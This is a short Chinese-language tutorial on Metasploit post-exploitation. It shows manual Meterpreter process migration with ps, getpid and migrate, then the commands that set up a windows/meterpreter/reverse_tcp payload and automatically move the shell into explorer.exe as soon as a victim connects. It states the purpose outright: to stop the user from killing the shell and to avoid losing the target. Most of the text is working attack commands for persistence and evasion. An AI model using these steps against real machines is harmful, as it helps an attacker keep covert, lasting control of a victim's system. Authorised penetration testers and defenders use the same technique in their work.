Msf生成Shell目标上线后自动化迁移指定进程

gclome

原文链接:Msf生成Shell目标上线后自动化迁移指定进程
1.进程迁移

1.在Meterpreter下输入ps(获取目标机正在运行的进程，记住目标进程的pid xxxx)

2.输入getpid命令（查看meterpreter shell的进程号）

3.输入migrate xxxx（将meterpreter shell的pid调到xxxx里相对稳定应用的进程里)

4.最后用getpid再次查看下是否更换成功。

2.上线后自动化迁移指定进程

在set payload windows/meterpreter/reverse_tcp 设置完了端口与HOST

执行如下命令：set autorunscript migrate -n explorer.exe

意思是上线后将shell进程迁移到了资源管理器。防止被用户删除掉，然后丢失目标。